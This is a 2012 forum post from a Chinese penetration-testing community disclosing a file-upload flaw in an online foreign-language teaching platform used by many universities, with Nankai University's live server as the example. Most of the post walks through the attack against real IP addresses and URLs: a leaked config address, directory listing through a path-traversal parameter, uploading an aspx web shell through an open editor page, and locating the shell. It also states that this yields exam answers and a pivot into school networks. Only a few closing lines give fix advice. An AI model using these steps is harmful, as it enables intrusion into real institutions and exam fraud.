中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
* m! Y. L6 G% ]* k1 a" L2 L3 L
, G4 A# J0 ~/ Z9 n; `  N& X1 y以南开大学的为例:
. z$ E+ d: t( s/ s, P& Ghttp://222.30.60.3/NPELS
! E6 h5 H' |3 F! `/ u$ ?* M; ONPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
! U% A7 @3 I8 D, ]- z8 }( K及版本号
+ G" n* c' t- m( y6 F<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
2 z* `9 |$ Q: y% |$ W( ]3 J2 F8 Ehttp://222.30.60.3/NPELS/CommonService.asmx
5 z" f/ p, j4 P1 ^6 u/ n0 u$ O使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

* l2 ^. \! o; [8 ?OOXX
3 B" W  L1 H1 g9 U# a! S  i3 I' D
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
& Y6 a( V* R- s; u5 J% B
* R( q5 L3 }$ T* A8 d  L2 x5 l' C列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
5 i6 ?8 L9 M# k; p5 r文件上传：
8 Z7 l# M  j, T1 v7 ]3 b" E' f+ ahttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2